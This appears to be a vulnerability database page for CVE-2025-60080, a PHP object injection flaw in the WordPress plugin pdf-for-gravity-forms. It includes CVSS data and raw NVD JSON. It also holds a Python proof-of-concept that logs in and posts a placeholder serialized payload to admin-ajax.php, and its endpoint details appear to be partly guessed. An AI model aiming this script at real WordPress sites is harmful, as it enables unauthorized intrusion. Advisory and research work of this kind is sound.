Security Vulnerability Report
中文
CVE-2025-60080 CVSS 7.5 HIGH

CVE-2025-60080

Published: 2025-12-18 08:16:08
Last Modified: 2026-04-15 00:35:42

Description

Deserialization of Untrusted Data vulnerability in add-ons.org PDF for Gravity Forms + Drag And Drop Template Builder pdf-for-gravity-forms allows Object Injection.This issue affects PDF for Gravity Forms + Drag And Drop Template Builder: from n/a through <= 6.5.0.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

pdf-for-gravity-forms (Drag And Drop Template Builder) <= 6.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-60080 PoC - Object Injection in pdf-for-gravity-forms # Target: WordPress site with pdf-for-gravity-forms plugin <= 6.5.0 target = "http://target-wordpress-site.com" username = "attacker" password = "attacker_password" session = requests.Session() # Step 1: Login to WordPress login_url = f"{target}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In" } response = session.post(login_url, data=login_data, allow_redirects=False) # Step 2: Identify vulnerable endpoint # The plugin processes template data through AJAX handlers vulnerable_endpoint = f"{target}/wp-admin/admin-ajax.php" # Step 3: Construct malicious serialized payload # This is a simplified example - actual exploitation requires finding # available classes in the plugin/theme that can form a POP chain malicious_payload = 'O:31:"SomeGadgetClass":1:{s:4:"data";s:10:";phpinfo();}";' # Step 4: Send exploit request exploit_data = { "action": "pdf_for_gf_save_template", "template_data": malicious_payload, "nonce": "attacker_provided_or_broken_nonce" } response = session.post(vulnerable_endpoint, data=exploit_data) print(f"Exploit sent. Status: {response.status_code}") print(f"Response: {response.text}") # Note: Full exploitation requires identifying the specific POP chain # available in the target environment's plugin/theme combination.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60080", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:08.173", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in add-ons.org PDF for Gravity Forms + Drag And Drop Template Builder pdf-for-gravity-forms allows Object Injection.This issue affects PDF for Gravity Forms + Drag And Drop Template Builder: from n/a through <= 6.5.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/pdf-for-gravity-forms/vulnerability/wordpress-pdf-for-gravity-forms-drag-and-drop-template-builder-plugin-6-3-0-php-object-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}